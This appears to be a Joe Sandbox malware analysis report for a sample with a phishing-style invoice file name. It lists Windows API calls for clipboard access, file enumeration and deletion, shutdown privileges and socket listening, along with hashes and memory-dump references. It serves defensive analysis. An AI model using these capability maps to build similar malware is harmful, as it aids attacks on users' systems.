                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                              • String ID:
                                                                              • API String ID: 4175595110-0
                                                                              • Opcode ID: bde58ccd98b4c9fcfd621da9ac379409994c1109fd24a15bac70298f654c8276
                                                                              • Instruction ID: bd1159240d0415ea3bd1097e988bec0e61d8e110279b4679fb9d4f49d495d3cf
                                                                              • Opcode Fuzzy Hash: bde58ccd98b4c9fcfd621da9ac379409994c1109fd24a15bac70298f654c8276
                                                                              • Instruction Fuzzy Hash: 44716EB290420AABDF10DFE4DC45FAEBBBCBF84300F044529EA18A7191D771A945CBA0
                                                                              APIs
                                                                              • OpenClipboard.USER32(0097CC08), ref: 0095EB29
                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0095EB37
                                                                              • GetClipboardData.USER32(0000000D), ref: 0095EB43
                                                                              • CloseClipboard.USER32 ref: 0095EB4F
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0095EB87
                                                                              • CloseClipboard.USER32 ref: 0095EB91
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0095EBBC
                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0095EBC9
                                                                              • GetClipboardData.USER32(00000001), ref: 0095EBD1
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0095EBE2
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0095EC22
                                                                              • IsClipboardFormatAvailable.USER32(0000000F), ref: 0095EC38
                                                                              • GetClipboardData.USER32(0000000F), ref: 0095EC44
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0095EC55
                                                                              • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0095EC77
                                                                              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0095EC94
                                                                              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0095ECD2
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0095ECF3
                                                                              • CountClipboardFormats.USER32 ref: 0095ED14
                                                                              • CloseClipboard.USER32 ref: 0095ED59
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                              • String ID:
                                                                              • API String ID: 420908878-0
                                                                              • Opcode ID: c1e22c477e6c303bd30532d51c41976f01306c200b4adf181fa3ba9cf2560b9b
                                                                              • Instruction ID: aeede31ff343e18d112ee79684afe52225fe84e8a679869ef18ae32dbe32cce2
                                                                              • Opcode Fuzzy Hash: c1e22c477e6c303bd30532d51c41976f01306c200b4adf181fa3ba9cf2560b9b
                                                                              • Instruction Fuzzy Hash: 7761D1752082029FD304EF26D889F2A77A8FF84705F14451DF85AC72A2DB72DE49DB62
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 009569BE
                                                                              • FindClose.KERNEL32(00000000), ref: 00956A12
                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00956A4E
                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00956A75
                                                                                • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00956AB2
                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00956ADF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                              • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                              • API String ID: 3830820486-3289030164
                                                                              • Opcode ID: ba574341eb3bf1d525d3112fc2fc5ace05da53167d5fc8005dcf5fe188a23e3a
                                                                              • Instruction ID: d0fe218a08402e98e54c4fbe6c4ce9498ea3d8539b023c952c8c45a03cdc0d86
                                                                              • Opcode Fuzzy Hash: ba574341eb3bf1d525d3112fc2fc5ace05da53167d5fc8005dcf5fe188a23e3a
                                                                              • Instruction Fuzzy Hash: 30D13E72508340AAC710EBA5C882EABB7ECFF99704F44491DF995C7191EB74DA48CB63
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00959663
                                                                              • GetFileAttributesW.KERNEL32(?), ref: 009596A1
                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 009596BB
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 009596D3
                                                                              • FindClose.KERNEL32(00000000), ref: 009596DE
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 009596FA
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0095974A
                                                                              • SetCurrentDirectoryW.KERNEL32(009A6B7C), ref: 00959768
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00959772
                                                                              • FindClose.KERNEL32(00000000), ref: 0095977F
                                                                              • FindClose.KERNEL32(00000000), ref: 0095978F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                              • String ID: *.*
                                                                              • API String ID: 1409584000-438819550
                                                                              • Opcode ID: 4a11ba880ceeab6e14cbd301e1e14c73f4c2072deba920c9b76d2059c49faf74
                                                                              • Instruction ID: 61c15a592e8d60cc891b812a3733ed554f0df105fecf5787d3edd42ab2b228c2
                                                                              • Opcode Fuzzy Hash: 4a11ba880ceeab6e14cbd301e1e14c73f4c2072deba920c9b76d2059c49faf74
                                                                              • Instruction Fuzzy Hash: 3D311772505209AEEF10EFB5EC08ADE37AC9F49321F14405AFC18E2190DB30DE888F60
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 009597BE
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00959819
                                                                              • FindClose.KERNEL32(00000000), ref: 00959824
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00959840
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00959890
                                                                              • SetCurrentDirectoryW.KERNEL32(009A6B7C), ref: 009598AE
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 009598B8
                                                                              • FindClose.KERNEL32(00000000), ref: 009598C5
                                                                              • FindClose.KERNEL32(00000000), ref: 009598D5
                                                                                • Part of subcall function 0094DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0094DB00
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                              • String ID: *.*
                                                                              • API String ID: 2640511053-438819550
                                                                              • Opcode ID: 69c100de46831065ee1dd4dbfc851c83c3b52820cdc99ae6dab96377552da277
                                                                              • Instruction ID: 1257e51883a36b248935a73b589cce0ecf9f4c96ab5c2d0f26f4b80fb805df6b
                                                                              • Opcode Fuzzy Hash: 69c100de46831065ee1dd4dbfc851c83c3b52820cdc99ae6dab96377552da277
                                                                              • Instruction Fuzzy Hash: 7131F272505219AEEF10EFB5EC48ADE37ACDF46325F144169ED18A21D0DB30DA88DB60
                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(?), ref: 00958257
                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00958267
                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00958273
                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00958310
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00958324
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00958356
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0095838C
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00958395
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectoryTime$File$Local$System
                                                                              • String ID: *.*
                                                                              • API String ID: 1464919966-438819550
                                                                              • Opcode ID: 1e9ab27cd19499a8f7d36c51596e3c1b3ba4de8462100ac1212b351b242c967e
                                                                              • Instruction ID: fe86fd0136d3b3caff69ae62a39e36bc13888ff4eec0f2cffc49f6b1955d1b1c
                                                                              • Opcode Fuzzy Hash: 1e9ab27cd19499a8f7d36c51596e3c1b3ba4de8462100ac1212b351b242c967e
                                                                              • Instruction Fuzzy Hash: 166148B25082459FCB10EF65C841AAFB3E8FF89311F04891DF999D7251EB31E949CB92
                                                                              APIs
                                                                                • Part of subcall function 008E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E3A97,?,?,008E2E7F,?,?,?,00000000), ref: 008E3AC2
                                                                                • Part of subcall function 0094E199: GetFileAttributesW.KERNEL32(?,0094CF95), ref: 0094E19A
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0094D122
                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0094D1DD
                                                                              • MoveFileW.KERNEL32(?,?), ref: 0094D1F0
                                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 0094D20D
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0094D237
                                                                                • Part of subcall function 0094D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0094D21C,?,?), ref: 0094D2B2
                                                                              • FindClose.KERNEL32(00000000,?,?,?), ref: 0094D253
                                                                              • FindClose.KERNEL32(00000000), ref: 0094D264
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                              • String ID: \*.*
                                                                              • API String ID: 1946585618-1173974218
                                                                              • Opcode ID: 5ab43182f92672787c8cd8aaa9451014589af4e3cdc2279721a21783194681c5
                                                                              • Instruction ID: 9aa138841782d6cb4f6b09ad55bbc5772ccfb941b4e7981522fe7390f99076ba
                                                                              • Opcode Fuzzy Hash: 5ab43182f92672787c8cd8aaa9451014589af4e3cdc2279721a21783194681c5
                                                                              • Instruction Fuzzy Hash: 32619C3180614DABCF15EBA5C992DEDB7B9FF56300F204069E411B31A2EB70AF49CB61
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                              • String ID:
                                                                              • API String ID: 1737998785-0
                                                                              • Opcode ID: aacf6deba15a5b30fdd8c52b3558541093cae9b705c7373c21443b420df9767e
                                                                              • Instruction ID: 8ae45932bf481318f40f3bb625d5550797d6e12853f80dbf6385ffd365c7a9c9
                                                                              • Opcode Fuzzy Hash: aacf6deba15a5b30fdd8c52b3558541093cae9b705c7373c21443b420df9767e
                                                                              • Instruction Fuzzy Hash: 694103716182119FD714CF16D889F19BBE4FF44319F04C09DE8298B6A2C736ED85CB80
                                                                              APIs
                                                                                • Part of subcall function 009416C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0094170D
                                                                                • Part of subcall function 009416C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0094173A
                                                                                • Part of subcall function 009416C3: GetLastError.KERNEL32 ref: 0094174A
                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 0094E932
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                              • String ID: $ $@$SeShutdownPrivilege
                                                                              • API String ID: 2234035333-3163812486
                                                                              • Opcode ID: 37a5fa49a39067a84a019308bcc40217d961dd0f2e453919aec29da63e77f413
                                                                              • Instruction ID: d274e782141dea60f94e6ab9bbc07305002e33046d14ea4f7fa461e5ed0b6a96
                                                                              • Opcode Fuzzy Hash: 37a5fa49a39067a84a019308bcc40217d961dd0f2e453919aec29da63e77f413
                                                                              • Instruction Fuzzy Hash: A401F973725211AFEB6426B49C86FBF729CB754790F150825FC13E21D2D6A59C809294
                                                                              APIs
                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00961276
                                                                              • WSAGetLastError.WSOCK32 ref: 00961283
                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 009612BA
                                                                              • WSAGetLastError.WSOCK32 ref: 009612C5
                                                                              • closesocket.WSOCK32(00000000), ref: 009612F4
                                                                              • listen.WSOCK32(00000000,00000005), ref: 00961303
                                                                              • WSAGetLastError.WSOCK32 ref: 0096130D
                                                                              • closesocket.WSOCK32(00000000), ref: 0096133C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$closesocket$bindlistensocket
                                                                              • String ID:
                                                                              • API String ID: 540024437-0
                                                                              • Opcode ID: b12829c498e3538a79b44b8017fe7534bb676cbdc800ceefb7c4e0c319a025c4
                                                                              • Instruction ID: d2a99820dc33a1f673082c0d6aa6f471ecb61fa5986a9fabbc31465667e22e4d
                                                                              • Opcode Fuzzy Hash: b12829c498e3538a79b44b8017fe7534bb676cbdc800ceefb7c4e0c319a025c4
                                                                              • Instruction Fuzzy Hash: 7C417F71A001409FD710DF68C498B6ABBE5BF46318F1C819CE8669F296C771ED81CBA1
                                                                              APIs
                                                                                • Part of subcall function 008E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E3A97,?,?,008E2E7F,?,?,?,00000000), ref: 008E3AC2
                                                                                • Part of subcall function 0094E199: GetFileAttributesW.KERNEL32(?,0094CF95), ref: 0094E19A
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0094D420
                                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 0094D470
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0094D481
                                                                              • FindClose.KERNEL32(00000000), ref: 0094D498
                                                                              • FindClose.KERNEL32(00000000), ref: 0094D4A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                              • String ID: \*.*
                                                                              • API String ID: 2649000838-1173974218
                                                                              • Opcode ID: 8b68771a663716ac8379183ec6e74ac8d4b1bbb865c36ed3ad9beed541ae9dd5
                                                                              • Instruction ID: 50434544baeb9c51cf99fe93bc52002787ac491f0ae9e212c3912401189d3442
                                                                              • Opcode Fuzzy Hash: 8b68771a663716ac8379183ec6e74ac8d4b1bbb865c36ed3ad9beed541ae9dd5
                                                                              • Instruction Fuzzy Hash: 68316F7101D3819BC204EF69D8958AF77ACFE92304F444A2DF4E5931A1EB20EA49D763
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: __floor_pentium4
                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                              • API String ID: 4168288129-2761157908
                                                                              • Opcode ID: 52634eb38c5af51f9258e7b83eea693aabd35235f378026fe9e18d24a81014dd
                                                                              • Instruction ID: 27b16bb383390d24e718a71fc6f18111578f19e1709c111dc521114cffeca59a
                                                                              • Opcode Fuzzy Hash: 52634eb38c5af51f9258e7b83eea693aabd35235f378026fe9e18d24a81014dd
                                                                              • Instruction Fuzzy Hash: 7EC22C71E0862D8FDB25CE289D547E9B7B9EB44344F1445EAD84EE7280E778AEC18F40
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 009564DC
                                                                              • CoInitialize.OLE32(00000000), ref: 00956639
                                                                              • CoCreateInstance.OLE32(0097FCF8,00000000,00000001,0097FB68,?), ref: 00956650
                                                                              • CoUninitialize.OLE32 ref: 009568D4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                              • String ID: .lnk
                                                                              • API String ID: 886957087-24824748
                                                                              • Opcode ID: bbe27fd6644057dc0ebd5d94546156e7e10b4d5b3c114a732d039d12bfb03940
                                                                              • Instruction ID: 397ed81502e97f2b979c4233448752e423a5a47b29b6bc724da891ca3d410133
                                                                              • Opcode Fuzzy Hash: bbe27fd6644057dc0ebd5d94546156e7e10b4d5b3c114a732d039d12bfb03940
                                                                              • Instruction Fuzzy Hash: 1FD159715082419FC314EF29C881A6BB7E8FF95704F50496DF595CB2A1EB70EE0ACB92
                                                                              APIs
                                                                              • GetForegroundWindow.USER32(?,?,00000000), ref: 009622E8
                                                                                • Part of subcall function 0095E4EC: GetWindowRect.USER32(?,?), ref: 0095E504
                                                                              • GetDesktopWindow.USER32 ref: 00962312
                                                                              • GetWindowRect.USER32(00000000), ref: 00962319
                                                                              • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00962355
                                                                              • GetCursorPos.USER32(?), ref: 00962381
                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009623DF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                              • String ID:
                                                                              • API String ID: 2387181109-0
                                                                              • Opcode ID: 41de01becf0434a2da198f91d3f80c3392b540d80be81f40f0c3d03adf9b7693
                                                                              • Instruction ID: 9771fcf244d5be404067d9ed49e834b52b4d78e5005956b0d14617662f77cf31
                                                                              • Opcode Fuzzy Hash: 41de01becf0434a2da198f91d3f80c3392b540d80be81f40f0c3d03adf9b7693
                                                                              • Instruction Fuzzy Hash: 1E31EE72509715AFC720DF54C849F9BBBA9FF88710F000A1DF98997291DB35EA48CB92
                                                                              APIs
                                                                                • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                              • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00959B78
                                                                              • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00959C8B
                                                                                • Part of subcall function 00953874: GetInputState.USER32 ref: 009538CB
                                                                                • Part of subcall function 00953874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00953966
                                                                              • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00959BA8
                                                                              • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00959C75
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
